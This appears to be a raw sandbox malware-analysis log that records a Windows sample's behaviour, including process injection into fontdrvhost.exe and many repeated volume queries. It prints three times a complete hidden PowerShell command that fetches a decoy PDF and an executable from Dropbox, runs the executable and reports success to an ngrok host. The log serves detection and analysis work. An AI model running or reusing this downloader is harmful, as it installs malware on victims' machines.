Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Code function: 23_3_02C69277 mov eax, dword ptr fs:[00000030h]		23_3_02C69277
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 24_3_02DB0283 mov eax, dword ptr fs:[00000030h]		24_3_02DB0283

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe

Process created: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe "C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe"

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe

Memory written: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe base: 2C30000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\a0df86d4-9e44-49c4-ab97-66c1270d73b1.pdf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe "C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -noprofile -command "$randompdf = join-path -path $env:temp -childpath ('{0}.pdf' -f ([guid]::newguid())); $randomexe = join-path -path $env:temp -childpath ('{0}.exe' -f ([guid]::newguid())); invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -outfile $randompdf; start-process -filepath 'msedge.exe' -argumentlist '--kiosk', $randompdf; invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -outfile $randomexe; start-process -filepath $randomexe; if (test-path $randomexe) { invoke-webrequest -uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -noprofile -command "$randompdf = join-path -path $env:temp -childpath ('{0}.pdf' -f ([guid]::newguid())); $randomexe = join-path -path $env:temp -childpath ('{0}.exe' -f ([guid]::newguid())); invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -outfile $randompdf; start-process -filepath 'msedge.exe' -argumentlist '--kiosk', $randompdf; invoke-webrequest -uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -outfile $randomexe; start-process -filepath $randomexe; if (test-path $randomexe) { invoke-webrequest -uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe

Code function: 23_3_02C5CDD5 cpuid

23_3_02C5CDD5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
